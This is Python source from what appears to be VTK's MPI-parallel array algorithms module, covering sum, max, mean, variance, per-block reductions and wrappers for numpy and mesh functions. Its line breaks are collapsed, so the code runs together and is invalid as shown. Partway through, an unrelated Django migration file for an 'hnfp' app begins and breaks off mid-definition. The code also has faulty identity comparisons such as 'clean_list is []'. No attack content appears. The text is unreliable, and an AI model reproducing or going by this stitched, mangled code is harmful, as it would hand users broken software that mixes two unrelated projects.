Note that this function is mainly for internal use by this module.""" def new_dfunc(array1, val2): return apply_dfunc(dfunc, array1, val2) return new_dfunc def _make_dsfunc(dsfunc): """ Given a function that requires two arguments (one array, one dataset), creates a closure that applies it to each member of a VTKCompositeDataArray. Note that this function is mainly for internal use by this module.""" def new_dsfunc(array, ds=None): if type(array) == dsa.VTKCompositeDataArray: res = [] for a in array.Arrays: if a is dsa.NoneArray: res.append(dsa.NoneArray) else: res.append(dsfunc(a, ds)) return dsa.VTKCompositeDataArray(res, dataset = array.DataSet) elif array is dsa.NoneArray: return dsa.NoneArray else: return dsfunc(array, ds) return new_dsfunc def _make_dsfunc2(dsfunc): """ Given a function that requires a dataset, creates a closure that applies it to each member of a VTKCompositeDataArray. Note that this function is mainly for internal use by this module.""" def new_dsfunc2(ds): if type(ds) == dsa.CompositeDataSet: res = [] for dataset in ds: res.append(dsfunc(dataset)) return dsa.VTKCompositeDataArray(res, dataset = ds) else: return dsfunc(ds) return new_dsfunc2 def _lookup_mpi_type(ntype): from mpi4py import MPI if ntype == numpy.bool: typecode = 'b' else: typecode = numpy.dtype(ntype).char return MPI.__TypeDict__[typecode] def _reduce_dims(array, comm): from mpi4py import MPI dims = numpy.array([0, 0], dtype=numpy.int32) if array is not dsa.NoneArray: shp = shape(array) if len(shp) == 0: dims = numpy.array([1, 0], dtype=numpy.int32) elif len(shp) == 1: dims = numpy.array([shp[0], 0], dtype=numpy.int32) else: dims = numpy.array(shp, dtype=numpy.int32) max_dims = numpy.array(dims, dtype=numpy.int32) mpitype = _lookup_mpi_type(numpy.int32) comm.Allreduce([dims, mpitype], [max_dims, mpitype], MPI.MAX) if max_dims[1] == 0: max_dims = numpy.array((max_dims[0],)) size = max_dims[0] else: size = max_dims[0]*max_dims[1] if max_dims[0] == 1: max_dims = 1 return (max_dims, size) def _global_func(impl, array, axis, controller): if type(array) == dsa.VTKCompositeDataArray: if axis is None or axis == 0: res = impl.serial_composite(array, axis) else: res = apply_ufunc(impl.op(), array, (axis,)) else: res = impl.op()(array, axis) if res is not dsa.NoneArray: res = res.astype(numpy.float64) if axis is None or axis == 0: if controller is None and vtkMultiProcessController is not None: controller = vtkMultiProcessController.GetGlobalController() if controller and controller.IsA("vtkMPIController"): from mpi4py import MPI comm = vtkMPI4PyCommunicator.ConvertToPython(controller.GetCommunicator()) max_dims, size = _reduce_dims(res, comm) # All NoneArrays if size == 0: return dsa.NoneArray; if res is dsa.NoneArray: if max_dims is 1: # Weird trick to make the array look like a scalar max_dims = () res = numpy.empty(max_dims) res.fill(impl.default()) res_recv = numpy.array(res) mpi_type = _lookup_mpi_type(res.dtype) comm.Allreduce([res, mpi_type], [res_recv, mpi_type], impl.mpi_op()) if array is dsa.NoneArray: return dsa.NoneArray res = res_recv return res def sum(array, axis=None, controller=None): """Returns the sum of all values along a particular axis (dimension). Given an array of m tuples and n components: * Default is to return the sum of all values in an array. * axis=0: Sum values of all components and return a one tuple, n-component array. * axis=1: Sum values of all components of each tuple and return an m-tuple, 1-component array. 
When called in parallel, this function will sum across processes when a controller argument is passed or the global controller is defined. To disable parallel summing when running in parallel, pass a dummy controller as follows: sum(array, controller=vtk.vtkDummyController()). """ class SumImpl: def op(self): return algs.sum def mpi_op(self): from mpi4py import MPI return MPI.SUM def serial_composite(self, array, axis): res = None arrays = array.Arrays for a in arrays: if a is not dsa.NoneArray: if res is None: res = algs.sum(a, axis).astype(numpy.float64) else: res += algs.sum(a, axis) return res def default(self): return numpy.float64(0) return _global_func(SumImpl(), array, axis, controller) def max(array, axis=None, controller=None): """Returns the max of all values along a particular axis (dimension). Given an array of m tuples and n components: * Default is to return the max of all values in an array. * axis=0: Return the max values of all tuples and return a one tuple, n-component array. * axis=1: Return the max values of all components of each tuple and return an m-tuple, 1-component array. When called in parallel, this function will compute the max across processes when a controller argument is passed or the global controller is defined. To disable parallel summing when running in parallel, pass a dummy controller as follows: max(array, controller=vtk.vtkDummyController()). """ class MaxImpl: def op(self): return algs.max def mpi_op(self): from mpi4py import MPI return MPI.MAX def serial_composite(self, array, axis): res = _apply_func2(algs.max, array, (axis,)) clean_list = [] for a in res: if a is not dsa.NoneArray: clean_list.append(a) if clean_list is []: return None return algs.max(clean_list, axis=0).astype(numpy.float64) def default(self): return numpy.finfo(numpy.float64).min return _global_func(MaxImpl(), array, axis, controller) def min(array, axis=None, controller=None): """Returns the min of all values along a particular axis (dimension). Given an array of m tuples and n components: * Default is to return the min of all values in an array. * axis=0: Return the min values of all tuples and return a one tuple, n-component array. * axis=1: Return the min values of all components of each tuple and return an m-tuple, 1-component array. When called in parallel, this function will compute the min across processes when a controller argument is passed or the global controller is defined. To disable parallel summing when running in parallel, pass a dummy controller as follows: min(array, controller=vtk.vtkDummyController()). 
""" class MinImpl: def op(self): return algs.min def mpi_op(self): from mpi4py import MPI return MPI.MIN def serial_composite(self, array, axis): res = _apply_func2(algs.min, array, (axis,)) clean_list = [] for a in res: if a is not dsa.NoneArray: clean_list.append(a) if clean_list is []: return None return algs.min(clean_list, axis=0).astype(numpy.float64) def default(self): return numpy.finfo(numpy.float64).max return _global_func(MinImpl(), array, axis, controller) def _global_per_block(impl, array, axis=None, controller=None): if axis > 0: return impl.op()(array, axis=axis, controller=controller) try: dataset = array.DataSet except AttributeError: dataset = None t = type(array) if t == dsa.VTKArray or t == numpy.ndarray: from vtk.vtkCommonDataModel import vtkMultiBlockDataSet array = dsa.VTKCompositeDataArray([array]) ds = vtkMultiBlockDataSet() ds.SetBlock(0, dataset.VTKObject) dataset = ds results = _apply_func2(impl.op2(), array, (axis,)) if controller is None and vtkMultiProcessController is not None: controller = vtkMultiProcessController.GetGlobalController() if controller and controller.IsA("vtkMPIController"): from mpi4py import MPI comm = vtkMPI4PyCommunicator.ConvertToPython(controller.GetCommunicator()) # First determine the number of components to use # for reduction res = dsa.NoneArray for res in results: if res is not dsa.NoneArray: break max_dims, size = _reduce_dims(res, comm) # All NoneArrays if size == 0: return dsa.NoneArray; # Next determine the max id to use for reduction # operations # Get all ids from dataset, including empty ones. ids = [] lmax_id = numpy.int32(0) if dataset is not None: it = dataset.NewIterator() it.UnRegister(None) it.SetSkipEmptyNodes(False) while not it.IsDoneWithTraversal(): _id = it.GetCurrentFlatIndex() lmax_id = numpy.max((lmax_id, _id)).astype(numpy.int32) if it.GetCurrentDataObject() is not None: ids.append(_id) it.GoToNextItem() max_id = numpy.array(0, dtype=numpy.int32) mpitype = _lookup_mpi_type(numpy.int32) comm.Allreduce([lmax_id, mpitype], [max_id, mpitype], MPI.MAX) has_ids = numpy.zeros(max_id+1, dtype=numpy.int32) for _id in ids: has_ids[_id] = 1 id_count = numpy.array(has_ids) comm.Allreduce([has_ids, mpitype], [id_count, mpitype], MPI.SUM) if numpy.all(id_count <= 1): return dsa.VTKCompositeDataArray(results, dataset=dataset) # Now that we know which blocks are shared by more than # 1 rank. The ones that have a count of 2 or more. reduce_ids = [] for _id in xrange(len(id_count)): if id_count[_id] > 1: reduce_ids.append(_id) to_reduce = len(reduce_ids) # If not block is shared, short circuit. No need to # communicate any more. if to_reduce == 0: return dsa.VTKCompositeDataArray(results, dataset=dataset) # Create the local array that will be used for # reduction. Set it to a value that won't effect # the reduction. lresults = numpy.empty(size*to_reduce) lresults.fill(impl.default()) # Just get non-empty ids. Doing this again in case # the traversal above results in a different order. # We need the same order since we'll use izip below. if dataset is not None: it = dataset.NewIterator() it.UnRegister(None) ids = [] while not it.IsDoneWithTraversal(): ids.append(it.GetCurrentFlatIndex()) it.GoToNextItem() # Fill the local array with available values. for _id, _res in izip(ids, results): success = True try: loc = reduce_ids.index(_id) except ValueError: success = False if success: if _res is not dsa.NoneArray: lresults[loc*size:(loc+1)*size] = _res.flatten() # Now do the MPI reduction. 
rresults = numpy.array(lresults) mpitype = _lookup_mpi_type(numpy.double) comm.Allreduce([lresults, mpitype], [rresults, mpitype], impl.mpi_op()) if array is dsa.NoneArray: return dsa.NoneArray # Fill in the reduced values. for i in xrange(to_reduce): _id = reduce_ids[i] success = True try: loc = ids.index(_id) except ValueError: success = False if success: if size == 1: results[loc] = dsa.VTKArray(rresults[i]) else: results[loc] = rresults[i*size:(i+1)*size].reshape(max_dims) return dsa.VTKCompositeDataArray(results, dataset=dataset) def sum_per_block(array, axis=None, controller=None): """Returns the sum of all values along a particular axis (dimension) for each block of an VTKCompositeDataArray. Given an array of m tuples and n components: * Default is to return the sum of all values in an array. * axis=0: Sum values of all components and return a one tuple, n-component array. * axis=1: Sum values of all components of each tuple and return an m-tuple, 1-component array. When called in parallel, this function will sum across processes when a controller argument is passed or the global controller is defined. To disable parallel summing when running in parallel, pass a dummy controller as follows: sum_per_block(array, controller=vtk.vtkDummyController()). """ class SumPerBlockImpl: def op(self): return sum def op2(self): return algs.sum def mpi_op(self): from mpi4py import MPI return MPI.SUM def default(self): return numpy.float64(0) return _global_per_block(SumPerBlockImpl(), array, axis, controller) def count_per_block(array, axis=None, controller=None): """Return the number of elements of each block in a VTKCompositeDataArray along an axis. - if axis is None, the number of all elements (ntuples * ncomponents) is returned. - if axis is 0, the number of tuples is returned. """ if axis > 0: raise ValueError("Only axis=None and axis=0 are supported for count") class CountPerBlockImpl: def op(self): return _array_count def op2(self): return _local_array_count def mpi_op(self): from mpi4py import MPI return MPI.SUM def default(self): return numpy.float64(0) return _global_per_block(CountPerBlockImpl(), array, axis, controller) def mean_per_block(array, axis=None, controller=None): """Returns the mean of all values along a particular axis (dimension) for each block of a VTKCompositeDataArray. Given an array of m tuples and n components: * Default is to return the mean of all values in an array. * axis=0: Return the mean values of all components and return a one tuple, n-component array. * axis=1: Return the mean values of all components of each tuple and return an m-tuple, 1-component array. When called in parallel, this function will compute the mean across processes when a controller argument is passed or the global controller is defined. To disable parallel summing when running in parallel, pass a dummy controller as follows: mean(array, controller=vtk.vtkDummyController()). """ if axis is None or axis == 0: return sum_per_block(array, axis, controller) / count_per_block(array, axis, controller) else: return sum(array, axis, controller) def max_per_block(array, axis=None, controller=None): """Returns the max of all values along a particular axis (dimension) for each block of a VTKCompositeDataArray. Given an array of m tuples and n components: * Default is to return the max of all values in an array. * axis=0: Return the max values of all components and return a one tuple, n-component array. 
* axis=1: Return the max values of all components of each tuple and return an m-tuple, 1-component array. When called in parallel, this function will compute the max across processes when a controller argument is passed or the global controller is defined. To disable parallel summing when running in parallel, pass a dummy controller as follows: max_per_block(array, controller=vtk.vtkDummyController()). """ class MaxPerBlockImpl: def op(self): return max def op2(self): return algs.max def mpi_op(self): from mpi4py import MPI return MPI.MAX def default(self): return numpy.finfo(numpy.float64).min return _global_per_block(MaxPerBlockImpl(), array, axis, controller) def min_per_block(array, axis=None, controller=None): """Returns the min of all values along a particular axis (dimension) for each block of a VTKCompositeDataArray. Given an array of m tuples and n components: * Default is to return the min of all values in an array. * axis=0: Return the min values of all components and return a one tuple, n-component array. * axis=1: Return the min values of all components of each tuple and return an m-tuple, 1-component array. When called in parallel, this function will compute the min across processes when a controller argument is passed or the global controller is defined. To disable parallel summing when running in parallel, pass a dummy controller as follows: min_per_block(array, controller=vtk.vtkDummyController()). """ class MinPerBlockImpl: def op(self): return min def op2(self): return algs.min def mpi_op(self): from mpi4py import MPI return MPI.MIN def default(self): return numpy.finfo(numpy.float64).max return _global_per_block(MinPerBlockImpl(), array, axis, controller) def all(array, axis=None, controller=None): """Returns True if all values of an array evaluate to True, returns False otherwise. This is useful to check if all values of an array match a certain condition such as: algorithms.all(array > 5) """ class MinImpl: def op(self): return algs.all def mpi_op(self): from mpi4py import MPI return MPI.LAND def serial_composite(self, array, axis): res = _apply_func2(algs.all, array, (axis,)) clean_list = [] for a in res: if a is not dsa.NoneArray: clean_list.append(a) if clean_list is []: return None return algs.all(clean_list, axis=0) def default(self, max_comps): return numpy.ones(max_comps, dtype=numpy.bool) return _global_func(MinImpl(), array, axis, controller) def _local_array_count(array, axis): if array is dsa.NoneArray: return numpy.int64(0) elif axis is None: return numpy.int64(array.size) else: return numpy.int64(shape(array)[0]) def _array_count(array, axis, controller): if array is dsa.NoneArray: size = numpy.int64(0) elif axis is None: size = numpy.int64(array.size) else: size = numpy.int64(shape(array)[0]) if controller is None and vtkMultiProcessController is not None: controller = vtkMultiProcessController.GetGlobalController() if controller and controller.IsA("vtkMPIController"): from mpi4py import MPI comm = vtkMPI4PyCommunicator.ConvertToPython(controller.GetCommunicator()) total_size = numpy.array(size, dtype=numpy.int64) mpitype = _lookup_mpi_type(numpy.int64) comm.Allreduce([size, mpitype], [total_size, mpitype], MPI.SUM) size = total_size return size def mean(array, axis=None, controller=None, size=None): """Returns the mean of all values along a particular axis (dimension). Given an array of m tuples and n components: * Default is to return the mean of all values in an array. 
* axis=0: Return the mean values of all components and return a one tuple, n-component array. * axis=1: Return the mean values of all components of each tuple and return an m-tuple, 1-component array. When called in parallel, this function will compute the mean across processes when a controller argument is passed or the global controller is defined. To disable parallel summing when running in parallel, pass a dummy controller as follows: mean(array, controller=vtk.vtkDummyController()). """ if axis is None or axis == 0: if size is None: size = _array_count(array, axis, controller) return sum(array, axis) / size else: if type(array) == dsa.VTKCompositeDataArray: return apply_ufunc(algs.mean, array, (axis,)) else: return algs.mean(array, axis) def var(array, axis=None, controller=None): """Returns the variance of all values along a particular axis (dimension). Given an array of m tuples and n components: * Default is to return the variance of all values in an array. * axis=0: Return the variance values of all components and return a one tuple, n-component array. * axis=1: Return the variance values of all components of each tuple and return an m-tuple, 1-component array. When called in parallel, this function will compute the variance across processes when a controller argument is passed or the global controller is defined. To disable parallel summing when running in parallel, pass a dummy controller as follows: var(array, controller=vtk.vtkDummyController()). """ if axis is None or axis == 0: size = _array_count(array, axis, controller) tmp = array - mean(array, axis, controller, size) return sum(tmp*tmp, axis, controller) / size else: if type(array) == dsa.VTKCompositeDataArray: return apply_ufunc(algs.var, array, (axis,)) else: return algs.var(array, axis) def std(array, axis=None, controller=None): """Returns the standard deviation of all values along a particular axis (dimension). Given an array of m tuples and n components: * Default is to return the standard deviation of all values in an array. * axis=0: Return the standard deviation values of all components and return a one tuple, n-component array. * axis=1: Return the standard deviation values of all components of each tuple and return an m-tuple, 1-component array. When called in parallel, this function will compute the standard deviation across processes when a controller argument is passed or the global controller is defined. To disable parallel summing when running in parallel, pass a dummy controller as follows: std(array, controller=vtk.vtkDummyController()). """ return sqrt(var(array, axis, controller)) def shape(array): "Returns the shape (dimensions) of an array." if type(array) == dsa.VTKCompositeDataArray: shp = None for a in array.Arrays: if a is not dsa.NoneArray: if shp is None: shp = list(a.shape) else: tmp = a.shape if (len(shp) != len(tmp)): raise ValueError("Expected arrays of same shape") shp[0] += tmp[0] for idx in range(1,len(tmp)): if shp[idx] != tmp[idx]: raise ValueError("Expected arrays of same shape") return tuple(shp) elif array is dsa.NoneArray: return () else: return numpy.shape(array) def make_vector(arrayx, arrayy, arrayz=None): """Given 2 or 3 scalar arrays, returns a vector array. 
If only 2 scalars are provided, the third component will be set to 0.""" if type(arrayx) == dsa.VTKCompositeDataArray and type(arrayy) == dsa.VTKCompositeDataArray and (type(arrayz) == dsa.VTKCompositeDataArray or arrayz is None): res = [] if arrayz is None: for ax, ay in izip(arrayx.Arrays, arrayy.Arrays): if ax is not dsa.NoneArray and ay is not dsa.NoneArray: res.append(algs.make_vector(ax, ay)) else: res.append(dsa.NoneArray) else: for ax, ay, az in izip(arrayx.Arrays, arrayy.Arrays, arrayz.Arrays): if ax is not dsa.NoneArray and ay is not dsa.NoneArray and az is not dsa.NoneArray: res.append(algs.make_vector(ax, ay, az)) else: res.append(dsa.NoneArray) return dsa.VTKCompositeDataArray(res, dataset = arrayx.DataSet) else: return algs.make_vector(arrayx, arrayy, arrayz) def unstructured_from_composite_arrays(points, arrays, controller=None): """Given a set of VTKCompositeDataArrays, creates a vtkUnstructuredGrid. The main goal of this function is to transform the output of XXX_per_block() methods to a single dataset that can be visualized and further processed. Here arrays is an iterable (e.g. list) of (array, name) pairs. Here is an example: centroid = mean_per_block(composite_data.Points) T = mean_per_block(composite_data.PointData['Temperature']) ug = unstructured_from_composite_arrays(centroid, (T, 'Temperature')) When called in parallel, this function makes sure that each array in the input dataset is represented only on 1 process. This is important because methods like mean_per_block() return the same value for blocks that are partitioned on all of the participating processes. If the same point were to be created across multiple processes in the output, filters like histogram would report duplicate values erroneously. """ try: dataset = points.DataSet except AttributeError: dataset = None if dataset is None and points is not dsa.NoneArray: raise ValueError("Expecting a points arrays with an associated dataset.") if points is dsa.NoneArray: cpts = [] else: cpts = points.Arrays ownership = numpy.zeros(len(cpts), dtype=numpy.int32) rank = 0 # Let's first create a map of array index to composite ids. if dataset is None: ids = [] else: it = dataset.NewIterator() it.UnRegister(None) itr = cpts.__iter__() ids = numpy.empty(len(cpts), dtype=numpy.int32) counter = 0 while not it.IsDoneWithTraversal(): _id = it.GetCurrentFlatIndex() ids[counter] = _id counter += 1 it.GoToNextItem() if controller is None and vtkMultiProcessController is not None: controller = vtkMultiProcessController.GetGlobalController() if controller and controller.IsA("vtkMPIController"): from mpi4py import MPI comm = vtkMPI4PyCommunicator.ConvertToPython(controller.GetCommunicator()) rank = comm.Get_rank() # Determine the max id to use for reduction # operations # Get all ids from dataset, including empty ones. 
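        # Empty leaves are deliberately included below (SetSkipEmptyNodes(False))
        # so that every rank walks the same flat-index space; the largest flat
        # index is then reduced with MPI.MAX to size the ownership arrays.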
lmax_id = numpy.int32(0) if dataset is not None: it = dataset.NewIterator() it.UnRegister(None) it.SetSkipEmptyNodes(False) while not it.IsDoneWithTraversal(): _id = it.GetCurrentFlatIndex() lmax_id = numpy.max((lmax_id, _id)).astype(numpy.int32) it.GoToNextItem() max_id = numpy.array(0, dtype=numpy.int32) mpitype = _lookup_mpi_type(numpy.int32) comm.Allreduce([lmax_id, mpitype], [max_id, mpitype], MPI.MAX) # Now we figure out which processes have which ids lownership = numpy.empty(max_id, dtype = numpy.int32) lownership.fill(numpy.iinfo(numpy.int32).max) ownership = numpy.empty(max_id, dtype = numpy.int32) if dataset is not None: it = dataset.NewIterator() it.UnRegister(None) it.InitTraversal() itr = cpts.__iter__() while not it.IsDoneWithTraversal(): _id = it.GetCurrentFlatIndex() if itr.next() is not dsa.NoneArray: lownership[_id] = rank it.GoToNextItem() mpitype = _lookup_mpi_type(numpy.int32) # The process with the lowest id containing a block will # produce the output for that block. comm.Allreduce([lownership, mpitype], [ownership, mpitype], MPI.MIN) # Iterate over blocks to produce points and arrays from vtk.vtkCommonDataModel import vtkUnstructuredGrid from vtk.vtkCommonCore import vtkDoubleArray, vtkPoints ugrid = vtkUnstructuredGrid() da = vtkDoubleArray() da.SetNumberOfComponents(3) pts = vtkPoints() pts.SetData(da) counter = 0 for pt in cpts: if ownership[ids[counter]] == rank: pts.InsertNextPoint(tuple(pt)) counter += 1 ugrid.SetPoints(pts) for ca, name in arrays: if ca is not dsa.NoneArray: da = vtkDoubleArray() ncomps = ca.Arrays[0].flatten().shape[0] da.SetNumberOfComponents(ncomps) counter = 0 for a in ca.Arrays: if ownership[ids[counter]] == rank: a = a.flatten() for i in range(ncomps): da.InsertNextValue(a[i]) counter += 1 if len(a) > 0: da.SetName(name) ugrid.GetPointData().AddArray(da) return ugrid sqrt = _make_ufunc(numpy.sqrt) sqrt.__doc__ = "Computes square root." negative = _make_ufunc(numpy.negative) negative.__doc__ = "Numerical negative, element-wise." reciprocal = _make_ufunc(numpy.reciprocal) reciprocal.__doc__ = "Return the reciprocal (1/x) of the argument, element-wise." square = _make_ufunc(numpy.square) square.__doc__ = "Return the element-wise square of the input." exp = _make_ufunc(numpy.exp) exp.__doc__ = "The exponential function." floor = _make_ufunc(numpy.floor) floor.__doc__ = "Returns the floor of floating point values." ceil = _make_ufunc(numpy.ceil) ceil.__doc__ = "Returns the ceiling of floating point values." rint = _make_ufunc(numpy.rint) rint.__doc__ = "Round elements of the array to the nearest integer." sin = _make_ufunc(numpy.sin) sin.__doc__ = "Computes sine of values in radians." cos = _make_ufunc(numpy.cos) cos.__doc__ = "Computes cosine of values in radians." tan = _make_ufunc(numpy.tan) tan.__doc__ = "Computes tangent of values in radians." arcsin = _make_ufunc(numpy.arcsin) arcsin.__doc__ = "Computes inverse sine." arccos = _make_ufunc(numpy.arccos) arccos.__doc__ = "Computes inverse cosine." arctan = _make_ufunc(numpy.arctan) arctan.__doc__ = "Computes inverse tangent." arctan2 = _make_dfunc(numpy.arctan2) arctan2.__doc__ = "Computes inverse tangent using two arguments." sinh = _make_ufunc(numpy.sinh) sinh.__doc__ = "Computes hyperbolic sine." cosh = _make_ufunc(numpy.cosh) cosh.__doc__ = "Computes hyperbolic cosine." tanh = _make_ufunc(numpy.tanh) tanh.__doc__ = "Computes hyperbolic tangent." arcsinh = _make_ufunc(numpy.arcsinh) arcsinh.__doc__ = "Computes inverse hyperbolic sine." 
arccosh = _make_ufunc(numpy.arccosh) arccosh.__doc__ = "Computes inverse hyperbolic cosine." arctanh = _make_ufunc(numpy.arctanh) arctanh.__doc__ = "Computes inverse hyperbolic tangent." where = _make_ufunc(numpy.where) where.__doc__ = """Returns the location (indices) of an array where the given expression is true. For scalars, it returns a single array of indices. For vectors and matrices, it returns two arrays: first with tuple indices, second with component indices. The output of this method can be used to extract the values from the array also by using it as the index of the [] operator. For example: >>> algs.where(algs.array([1,2,3]) == 2) (array([1]),) >>> algs.where(algs.array([[1,2,3], [2,1,1]]) == 2) (array([0, 1]), array([1, 0])) >>> a = array([[1,2,3], [2,1,1]]) >>> indices = algs.where(a > 2) >>> a[indices] array([3]) """ flatnonzero = _make_ufunc(numpy.flatnonzero) flatnonzero.__doc__ = "Return indices that are non-zero in the flattened version of the input array." nonzero = _make_ufunc(numpy.nonzero) nonzero.__doc__ = "Return the indices of the non-zero elements of the input array." expand_dims = _make_dfunc(numpy.expand_dims) expand_dims.__doc__ = """Insert a new dimension, corresponding to a given position in the array shape. In VTK, this function's main use is to enable an operator to work on a vector and a scalar field. For example, say you want to divide each component of a vector by the magnitude of that vector. You might try this: >>> v VTKArray([[ 1., 1., 1.], [ 1., 1., 1.], [ 1., 1., 1.], [ 1., 1., 1.], [ 1., 1., 1.]]) >>> algs.mag(v) VTKArray([ 1.73205081, 1.73205081, 1.73205081, 1.73205081, 1.73205081]) >>> v / algs.mag(v) Traceback (most recent call last): File "<stdin>", line 1, in <module> ValueError: operands could not be broadcast together with shapes (5,3) (5) The division operator does not know how to map a scalar to a vector due to a mismatch in dimensions. This can be solved by making the scalar a vector of 1 component (increasing its dimension to 2) as follows: >>> v / algs.expand_dims(algs.mag(v), 1) VTKArray([[ 0.57735027, 0.57735027, 0.57735027], [ 0.57735027, 0.57735027, 0.57735027], [ 0.57735027, 0.57735027, 0.57735027], [ 0.57735027, 0.57735027, 0.57735027], [ 0.57735027, 0.57735027, 0.57735027]])""" abs = _make_ufunc(algs.abs) abs.__doc__ = "Returns the absolute values of an array of scalars/vectors/tensors." area = _make_dsfunc2(algs.area) area.__doc__ = "Returns the surface area of each 2D cell in a mesh." aspect = _make_dsfunc2(algs.aspect) aspect.__doc__ = "Returns the aspect ratio of each cell in a mesh. See Verdict documentation for details." aspect_gamma = _make_dsfunc2(algs.aspect_gamma) aspect_gamma.__doc__ = "Returns the aspect gamma of each cell in a mesh. This metric compares root-mean-square edge length to volume. See Verdict documentation for details." condition = _make_dsfunc2(algs.condition) condition.__doc__ = "Returns the condition number of each cell in a mesh. See Verdict documentation for details." cross = _make_dfunc(algs.cross) cross.__doc__ = "Return the cross product of two vectors." curl = _make_dsfunc(algs.curl) curl.__doc__ = "Returns the curl a vector field." divergence = _make_dsfunc(algs.divergence) divergence.__doc__ = "Returns the divergence of a vector field." det = _make_ufunc(algs.det) det.__doc__ = "Returns the determinant of 2D matrices." determinant = _make_ufunc(algs.determinant) determinant.__doc__ = "Returns the determinant of 2D matrices." 
diagonal = _make_dsfunc2(algs.diagonal) diagonal.__doc__ = "Returns the diagonal length of each cell in a dataset. See Verdict documentation for details" dot = _make_dfunc(algs.dot) dot.__doc__ = "Returns the dot product of two vectors." eigenvalue = _make_ufunc(algs.eigenvalue) eigenvalue.__doc__ = "Returns the eigenvalues of 3x3 matrices. Currently only works with symmetric matrices." eigenvector = _make_ufunc(algs.eigenvector) eigenvector.__doc__ = "Returns the eigenvectors of 3x3 matrices. Currently only works with symmetric matrices." gradient = _make_dsfunc(algs.gradient) gradient.__doc__ = "Returns the gradient of scalars or vectors." inv = _make_ufunc(algs.inv) inv.__doc__ = "Returns the inverse of 3x3 matrices." inverse = _make_ufunc(algs.inverse) inverse.__doc__ = "Returns the inverse of 3x3 matrices." jacobian = _make_dsfunc2(algs.jacobian) jacobian.__doc__ = "Returns the Jacobian of a dataset." laplacian = _make_dsfunc(algs.laplacian) laplacian.__doc__ = "Returns the Laplacian of a scalar field." ln = _make_ufunc(algs.ln) ln.__doc__ = "Returns the natural logarithm of its input." log = _make_ufunc(algs.log) log.__doc__ = "Returns the natural logarithm of its input." log10 = _make_ufunc(algs.log10) log10.__doc__ = "Returns the base 10 logarithm of its input." max_angle = _make_dsfunc2(algs.max_angle) max_angle.__doc__ = "Returns the maximum angle of each cell in a dataset. See Verdict documentation for details" mag = _make_ufunc(algs.mag) mag.__doc__ = "Returns the magnitude of vectors." min_angle = _make_dsfunc2(algs.min_angle) min_angle.__doc__ = "Returns the minimum angle of each cell in a dataset." norm = _make_ufunc(algs.norm) norm.__doc__ = "Computes the normalized values of vectors." shear = _make_dsfunc2(algs.shear) shear.__doc__ = "Returns the shear of each cell in a dataset. See Verdict documentation for details." skew = _make_dsfunc2(algs.skew) skew.__doc__ = "Returns the skew of each cell in a dataset. See Verdict documentation for details." strain = _make_dsfunc(algs.strain) strain.__doc__ = "Given a deformation vector, this function computes the infinitesimal (Cauchy) strain tensor. It can also be used to compute strain rate if the input is velocity." surface_normal = _make_dsfunc2(algs.surface_normal) surface_normal.__doc__ = "Returns the surface normal of each cell in a dataset." trace = _make_ufunc(algs.trace) trace.__doc__ = "Returns the trace of square matrices." volume = _make_dsfunc2(algs.volume) volume.__doc__ = "Returns the volume of each cell in a dataset. Use sum to calculate total volume of a dataset." vorticity = _make_dsfunc(algs.vorticity) vorticity.__doc__ = "Given a velocity field, calculates vorticity." vertex_normal = _make_dsfunc2(algs.vertex_normal) vertex_normal.__doc__ = "Returns the normal at each vertex of a dataset, which is defined as the average of the cell normals of all cells containing that vertex." logical_not = _make_ufunc(numpy.logical_not) logical_not.__doc__ = "Computes the truth value of NOT x element-wise." divide = _make_dfunc(numpy.divide) divide.__doc__ = "Element by element division. Both elements can be single values or arrays. Same as /." multiply = _make_dfunc(numpy.multiply) multiply.__doc__ = "Element by element multiplication. Both elements can be single values or arrays. Same as *." add = _make_dfunc(numpy.add) add.__doc__ = "Element by element addition. Both elements can be single values or arrays. Same as +." 
subtract = _make_dfunc(numpy.subtract) subtract.__doc__ = "Returns the difference of two values element-wise. Same as x - y." mod = _make_dfunc(numpy.mod) mod.__doc__ = "Computes x1 - floor(x1 / x2) * x2, the result has the same sign as the divisor x2. It is equivalent to the Python modulus operator x1 % x2. Same as remainder." remainder = _make_dfunc(numpy.remainder) remainder.__doc__ = "Computes x1 - floor(x1 / x2) * x2, the result has the same sign as the divisor x2. It is equivalent to the Python modulus operator x1 % x2. Same as mod." power = _make_dfunc(numpy.power) power.__doc__ = "First array elements raised to powers from second array, element-wise." hypot = _make_dfunc(numpy.hypot) hypot.__doc__ = "Given the 'legs' of a right triangle, return its hypotenuse."
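# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the upstream module): the wrappers defined
# above accept plain numpy arrays as well as VTKCompositeDataArray, so the
# axis semantics described in the docstrings can be exercised serially.  The
# expected values in the comments assume a 5x3 array of ones, mirroring the
# expand_dims docstring example.
if __name__ == "__main__":
    _v = numpy.ones((5, 3))
    print("sum of all values: %s" % sum(_v))            # 15.0
    print("per-component sum: %s" % sum(_v, axis=0))    # [ 5.  5.  5.]
    print("per-tuple mean   : %s" % mean(_v, axis=1))   # [ 1.  1.  1.  1.  1.]
    # normalize each tuple, exactly as in the expand_dims docstring above
    print("normalized tuples:\n%s" % (_v / expand_dims(mag(_v), 1)))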
# -*- coding: utf-8 -*- # Generated by Django 1.11.2 on 2017-08-23 17:13 from __future__ import unicode_literals import ckeditor.fields import django.contrib.gis.db.models.fields from django.db import migrations, models import django.db.models.deletion import django.utils.timezone class Migration(migrations.Migration): replaces = [('hnfp', '0001_initial'), ('hnfp', '0002_auto_20170710_1438'), ('hnfp', '0003_post'), ('hnfp', '0004_aoi_jobopportunity'), ('hnfp', '0005_auto_20170728_1518'), ('hnfp', '0006_auto_20170728_1536'), ('hnfp', '0007_auto_20170808_1556'), ('hnfp', '0008_auto_20170808_1558'), ('hnfp', '0009_auto_20170809_1521'), ('hnfp', '0010_auto_20170809_1626'), ('hnfp', '0011_auto_20170809_1635'), ('hnfp', '0012_auto_20170810_1103'), ('hnfp', '0015_auto_20170816_1303'), ('hnfp', '0016_auto_20170816_1332'), ('hnfp', '0017_auto_20170816_1509'), ('hnfp', '0018_auto_20170816_1528'), ('hnfp', '0019_auto_20170819_1718'), ('hnfp', '0020_auto_20170820_1602'), ('hnfp', '0021_auto_20170822_1249'), ('hnfp', '0022_auto_20170822_1313'), ('hnfp', '0025_auto_20170822_1446'), ('hnfp', '0026_auto_20170822_1712')] initial = True dependencies = [ ('drawing', '0003_auto_20170706_1438'), ] operations = [ migrations.CreateModel( name='AnswerBase', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('created', models.DateTimeField(auto_now_add=True)), ('updated', models.DateTimeField(auto_now=True)), ], ), migrations.CreateModel( name='Category', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, 